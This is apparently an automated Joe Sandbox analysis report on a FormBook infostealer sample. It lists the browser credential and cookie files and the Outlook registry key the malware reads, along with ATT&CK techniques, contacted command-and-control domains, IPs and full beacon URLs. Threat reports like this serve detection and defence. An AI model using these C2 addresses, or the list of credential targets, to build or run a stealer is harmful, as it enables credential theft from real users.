Source: Yara match	File source: 00000005.00000002.1679280371.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678559099.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678063769.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750980212.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3753130642.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: k9OEsV37GE.exe	Binary or memory string: WIN_81
Source: k9OEsV37GE.exe	Binary or memory string: WIN_XP
Source: k9OEsV37GE.exe	Binary or memory string: WIN_XPe
Source: k9OEsV37GE.exe	Binary or memory string: WIN_VISTA
Source: k9OEsV37GE.exe	Binary or memory string: WIN_7
Source: k9OEsV37GE.exe	Binary or memory string: WIN_8
Source: k9OEsV37GE.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3745363879.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750754693.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3756481473.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1679280371.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678559099.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678063769.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750980212.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3753130642.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00F76283
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00F76747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
k9OEsV37GE.exe	76%	ReversingLabs	Win32.Backdoor.FormBook
k9OEsV37GE.exe	67%	Virustotal		Browse
k9OEsV37GE.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.44756.pizza	0%	Avira URL Cloud	safe
http://www.linkdex.com/bots/)	0%	Avira URL Cloud	safe
http://www.orthomumbai.online/uj4z/	0%	Avira URL Cloud	safe
http://www.aihuzhibo.net/lkpz/?EtJTX=_JVX4ryxDRQpLJF&cNPH=a+8tZPlcc3MNn/IO7b26MGHwqGX4ZM28Vil8O2eWSStdH20Wtc2TLwFiK67R05JNij1gEaiCLQN0rb1G+EZEFovULwD+AM9JU3Wl4pQU58Rskq7vQFRuJegvcl6TpOCUQoL70LsVvLez	0%	Avira URL Cloud	safe
http://www.gern.dev/xbnt/?EtJTX=_JVX4ryxDRQpLJF&cNPH=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw	0%	Avira URL Cloud	safe
http://www.newbh.pro/fpja/	0%	Avira URL Cloud	safe
http://www.thinkone.xyz/b0aw/	0%	Avira URL Cloud	safe
http://www.thinkone.xyz/b0aw/?EtJTX=_JVX4ryxDRQpLJF&cNPH=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT	0%	Avira URL Cloud	safe
http://www.fzmmkj.shop/okq9/	0%	Avira URL Cloud	safe
http://www.mraber.dev/ixqi/?cNPH=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.givvjn.info/wl3x/?cNPH=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.fzmmkj.shop/okq9/?cNPH=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.orthomumbai.online/uj4z/?cNPH=Rv+d8Vs9QFh7eFGUjZF/XurtC+CuZHbGRmUS1zsDZ6F1EcO3zJOMOEGzKUBqsPG0xKvqL2cjuvX3dLI344VOQvo4ekzNmUg9f6dKwYBEi/hv3+rbh8HEetaIdO68foaZIfZ4bIgAitoH&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.gern.dev/xbnt/	0%	Avira URL Cloud	safe
http://www.aihuzhibo.net/lkpz/	0%	Avira URL Cloud	safe
http://www.dkeqqi.info/1dyw/	0%	Avira URL Cloud	safe
http://einpisalpace.shop/	0%	Avira URL Cloud	safe
http://www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.44756.pizza/pv93/	0%	Avira URL Cloud	safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	0%	Avira URL Cloud	safe
http://www.uzshou.world/kbd2/	0%	Avira URL Cloud	safe
http://www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.l03678.xyz/798t/?cNPH=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.newbh.pro/fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF	0%	Avira URL Cloud	safe
http://www.mraber.dev/ixqi/	0%	Avira URL Cloud	safe
http://www.givvjn.info/wl3x/	0%	Avira URL Cloud	safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	0%	Avira URL Cloud	safe
http://www.l03678.xyz/798t/	0%	Avira URL Cloud	safe
https://www.newbh.pro/fpja/	0%	Avira URL Cloud	safe
http://www.einpisalpace.shop/8g74/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.aihuzhibo.net	192.186.58.31	true	true	unknown
www.newbh.pro	176.57.65.76	true	true	unknown
www.dkeqqi.info	47.83.1.90	true	true	unknown
www.einpisalpace.shop	188.114.97.3	true	true	unknown
www.orthomumbai.online	75.2.103.23	true	true	unknown
zcdn.8383dns.com	134.122.133.80	true	false	high
www.aoivej.info	47.83.1.90	true	true	unknown
mraber.dev	46.38.243.234	true	true	unknown
www.gern.dev	185.151.30.223	true	true	unknown
www.givvjn.info	47.83.1.90	true	true	unknown
www.l03678.xyz	162.218.30.235	true	true	unknown
www.thinkone.xyz	209.74.79.41	true	true	unknown
www.fzmmkj.shop	18.163.74.139	true	true	unknown
www.uzshou.world	104.21.96.1	true	true	unknown
www.mraber.dev	unknown	unknown	false	unknown
www.multichaindapps.pro	unknown	unknown	false	unknown
www.44756.pizza	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.fzmmkj.shop/okq9/	true	Avira URL Cloud: safe	unknown
http://www.gern.dev/xbnt/?EtJTX=_JVX4ryxDRQpLJF&cNPH=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw	true	Avira URL Cloud: safe	unknown
http://www.newbh.pro/fpja/	true	Avira URL Cloud: safe	unknown
http://www.orthomumbai.online/uj4z/	true	Avira URL Cloud: safe	unknown
http://www.thinkone.xyz/b0aw/	true	Avira URL Cloud: safe	unknown
http://www.thinkone.xyz/b0aw/?EtJTX=_JVX4ryxDRQpLJF&cNPH=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT	true	Avira URL Cloud: safe	unknown
http://www.mraber.dev/ixqi/?cNPH=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.aihuzhibo.net/lkpz/?EtJTX=_JVX4ryxDRQpLJF&cNPH=a+8tZPlcc3MNn/IO7b26MGHwqGX4ZM28Vil8O2eWSStdH20Wtc2TLwFiK67R05JNij1gEaiCLQN0rb1G+EZEFovULwD+AM9JU3Wl4pQU58Rskq7vQFRuJegvcl6TpOCUQoL70LsVvLez	true	Avira URL Cloud: safe	unknown
http://www.fzmmkj.shop/okq9/?cNPH=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/wl3x/?cNPH=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.orthomumbai.online/uj4z/?cNPH=Rv+d8Vs9QFh7eFGUjZF/XurtC+CuZHbGRmUS1zsDZ6F1EcO3zJOMOEGzKUBqsPG0xKvqL2cjuvX3dLI344VOQvo4ekzNmUg9f6dKwYBEi/hv3+rbh8HEetaIdO68foaZIfZ4bIgAitoH&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.gern.dev/xbnt/	true	Avira URL Cloud: safe	unknown
http://www.aihuzhibo.net/lkpz/	true	Avira URL Cloud: safe	unknown
http://www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.44756.pizza/pv93/	true	Avira URL Cloud: safe	unknown
http://www.dkeqqi.info/1dyw/	true	Avira URL Cloud: safe	unknown
http://www.uzshou.world/kbd2/	true	Avira URL Cloud: safe	unknown
http://www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.l03678.xyz/798t/	true	Avira URL Cloud: safe	unknown
http://www.newbh.pro/fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/wl3x/	true	Avira URL Cloud: safe	unknown
http://www.l03678.xyz/798t/?cNPH=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&EtJTX=_JVX4ryxDRQpLJF	true	Avira URL Cloud: safe	unknown
http://www.mraber.dev/ixqi/	true	Avira URL Cloud: safe	unknown
http://www.einpisalpace.shop/8g74/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.44756.pizza	ClIUTLKtdeP.exe, 00000009.00000002.3756481473.0000000004C87000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linkdex.com/bots/)	firefox.exe, 0000000B.00000002.1991641165.00000251C6473000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://einpisalpace.shop/	ClIUTLKtdeP.exe, 00000009.00000002.3753813140.0000000003540000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	relog.exe, 00000008.00000002.3753170617.0000000004366000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000039F6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	relog.exe, 00000008.00000002.3753170617.0000000004366000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000039F6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newbh.pro/fpja/	ClIUTLKtdeP.exe, 00000009.00000002.3753813140.000000000308A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.57.65.76	www.newbh.pro	Bosnia and Herzegowina	47959	TELINEABA	true
75.2.103.23	www.orthomumbai.online	United States	16509	AMAZON-02US	true
18.163.74.139	www.fzmmkj.shop	United States	16509	AMAZON-02US	true
47.83.1.90	www.dkeqqi.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
209.74.79.41	www.thinkone.xyz	United States	31744	MULTIBAND-NEWHOPEUS	true
188.114.97.3	www.einpisalpace.shop	European Union	13335	CLOUDFLARENETUS	true
104.21.96.1	www.uzshou.world	United States	13335	CLOUDFLARENETUS	true
192.186.58.31	www.aihuzhibo.net	United States	132721	PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL	true
134.122.133.80	zcdn.8383dns.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	false
185.151.30.223	www.gern.dev	United Kingdom	48254	TWENTYIGB	true
162.218.30.235	www.l03678.xyz	United States	62587	ANT-CLOUDUS	true
46.38.243.234	mraber.dev	Germany	197540	NETCUP-ASnetcupGmbHDE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588583
Start date and time:	2025-01-11 02:42:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	k9OEsV37GE.exe renamed because original name is a hash value
Original Sample Name:	dd60661e4cbb841dc66168c8d7724c93706a7afaefb71fbdbccbb46d9f4456f4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@15/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 52 Number of non-executed functions: 267
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
22:17:53	API Interceptor	9304873x Sleep call for process: relog.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
176.57.65.76	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz
176.57.65.76	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/z9pt/
75.2.103.23	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.innovationpulse.tech/4ia5/
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.urssaf.pro/z0cc/
	ENQUIRY LED LIGHTS.pif.exe	Get hash	malicious	FormBook	Browse	www.asklifeclarity.shop/b5w1/
	Bill Of Lading_MEDUVB935991.pdf.exe	Get hash	malicious	FormBook	Browse	www.heeraka.info/o7wc/
	rDRAWINGDWGSINC.exe	Get hash	malicious	FormBook	Browse	www.webeuz.buzz/pw0n/
	quote894590895pdf.exe	Get hash	malicious	FormBook	Browse	www.webeuz.buzz/pw0n/
	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Get hash	malicious	FormBook	Browse	www.heeraka.info/o7wc/
	PO59458.exe	Get hash	malicious	FormBook	Browse	www.webeuz.buzz/okq4/
18.163.74.139	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.fzmmkj.shop/okq9/?wtE0B=1LjxZz&9F=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ
47.83.1.90	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz
	FG5wHs4fVX.exe	Get hash	malicious	FormBook	Browse	www.cloijz.info/r4db/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	www.cloijz.info/r4db/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/hf4a/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cruycq.info/6jon/
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.cruycq.info/mywm/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
zcdn.8383dns.com	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	134.122.133.80
	0Z2lZiPk5K.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	134.122.133.80
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.21.203.24
www.einpisalpace.shop	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	1162-201.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.aihuzhibo.net	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	192.186.58.31
